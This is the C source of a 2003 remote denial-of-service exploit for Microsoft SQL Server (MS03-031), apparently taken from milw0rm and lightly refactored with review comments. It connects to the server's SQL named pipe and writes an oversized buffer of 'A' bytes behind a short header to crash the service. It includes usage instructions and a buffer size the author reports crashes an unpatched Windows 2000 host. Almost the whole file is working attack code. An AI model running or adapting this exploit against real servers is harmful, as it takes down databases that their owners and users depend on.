MS Windows SQL Server Denial of Service Remote Exploit MS03031


  1    ////////////////////////////////////////////////////////////////
  2    //
  3    //      Microsoft SQL Server DoS Remote Exploit (MS03-031)
  4    //                    By refdom of xfocus
  5    //
  6    ////////////////////////////////////////////////////////////////
  7
#include <windows.h>

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
  11
  12
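/*
 * Print the banner and command-line usage to stdout.
 *
 * Two corrections to the text as it appeared in the original listing: the
 * example invocation was missing the space between the program name and the
 * host, and the advisory number used a non-ASCII minus sign (a rendering
 * artefact), now a plain hyphen.
 */
void Usage(void)
{
    /* One entry per output line, emitted in order. None of the strings
     * contain a conversion specifier, so fputs() is equivalent to the
     * original printf() calls. */
    static const char *const banner[] = {
        "******************************************\n",
        "exp for Microsoft SQL Server DoS(MS03-031)\n\n",
        "\t Written by Refdom\n",
        /* NOTE(review): the address separators look stripped by the page
         * rendering; left as found rather than guessed. */
        "\t Email: refdom xfocus org\n",
        "\t Homepage: www.xfocus.org\n\n",
        "Usage: DOSMSSQL.exe server buffersize\n",
        "eg: DOSMSSQL.exe 192.168.0.1 9000\n\n",
        "The buffersize depends on service pack level.\n",
        "I test it on my server: windows 2000, mssqlserver no sp.\n",
        "when buffersize is 9000, the server can be crashed.\n",
        "\n",
        "*******************************************\n\n",
    };
    size_t i;

    for (i = 0; i < sizeof banner / sizeof banner[0]; i++)
        fputs(banner[i], stdout);
}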
  28
  29
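/*
 * Entry point: connect to the target's SQL Server named pipe and write one
 * oversized message to it.
 *
 * argv[1] - target host name or address (fewer than 20 characters)
 * argv[2] - number of payload bytes to send, decimal; the author reports
 *           that the value needed to crash the service depends on the
 *           service pack level (9000 on an unpatched Windows 2000 host)
 *
 * Returns 0 when the write succeeds and 1 on any usage, allocation or pipe
 * error. The original returned 0 on every path; a non-zero status lets the
 * tool be driven from scripts.
 *
 * Historical proof-of-concept for MS03-031 (2003). It is intended to take
 * the service down, so run it only against hosts you are authorised to test.
 */
int main(int argc, char *argv[])
{
    char pipe_name[50];
    char *payload = NULL;
    unsigned long size = 0;
    char *end = NULL;
    int n;
    int rc = 1;
    HANDLE pipe = INVALID_HANDLE_VALUE;
    DWORD written = 0;
    DWORD mode = PIPE_READMODE_MESSAGE;
    /* Leading bytes written over the 'A' fill. 0x12/0x01 look like a TDS
     * packet type/status pair (pre-login, end of message) -- presumed from
     * the values, not verified here. */
    static const unsigned char hdr[] = { 0x12, 0x01, 0x00 };

    Usage();
    printf("Starting...\n");

    if (argc != 3)
        goto out;

    /* Same bound as the original; with it the formatted name always fits in
     * pipe_name, and the snprintf() truncation check makes that explicit
     * instead of relying on sprintf() never overrunning. */
    if (strlen(argv[1]) >= 20) {
        printf("Error!server\n");
        goto out;
    }
    /* NOTE(review): this format yields \\host\\.\pipe\sql\query. The remote
     * form of SQL Server's default pipe is normally \\host\pipe\sql\query; the
     * doubled separator may be an artefact of how this listing was rendered,
     * so verify the name against the target before relying on it. */
    n = snprintf(pipe_name, sizeof pipe_name,
                 "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
    if (n < 0 || (size_t)n >= sizeof pipe_name) {
        printf("Error!server\n");
        goto out;
    }

    /* atol() silently accepted "-1" (which wrapped to a ~4 GB size) and text
     * like "abc" (0, which made the header store at payload[2] run one byte
     * past a 2-byte allocation). Require at least the header length and
     * leave room for the +2 below and the DWORD passed to WriteFile(). */
    errno = 0;
    size = strtoul(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE
        || size < sizeof hdr || size > ULONG_MAX - 2) {
        printf("Error!buffersize\n");
        goto out;
    }

    /* size + 1 bytes go on the wire: the fill plus one terminating zero.
     * calloc() gives the zeroed tail the original memset() produced. */
    payload = calloc(size + 2, 1);
    if (payload == NULL) {
        printf("malloc error!\n");
        goto out;
    }
    memset(payload, 'A', size);
    memcpy(payload, hdr, sizeof hdr);

    printf("Connecting Server...\n");
    pipe = CreateFile(pipe_name, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                      OPEN_EXISTING, 0, NULL);
    if (pipe == INVALID_HANDLE_VALUE) {
        /* GetLastError() returns a DWORD; %d was a format mismatch. */
        printf("Error!Connect server!%lu\n", (unsigned long)GetLastError());
        goto out;
    }

    /* Message read mode, as in the original; no byte or timeout limits. */
    if (!SetNamedPipeHandleState(pipe, &mode, NULL, NULL)) {
        printf("Error!SetNamedPipeHandleState.%lu\n",
               (unsigned long)GetLastError());
        goto out;
    }

    if (!WriteFile(pipe, payload, (DWORD)(size + 1), &written, NULL)) {
        printf("\n\tError!WriteFile.%lu\n\n", (unsigned long)GetLastError());
        printf("When see the error message, the target may be crashed!!\n\n");
        goto out;
    }
    rc = 0;

out:
    /* The original leaked both the pipe handle and the buffer on every path. */
    if (pipe != INVALID_HANDLE_VALUE)
        CloseHandle(pipe);
    free(payload);
    return rc;
}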
  112
  113   // milw0rm.com [2003-07-25]



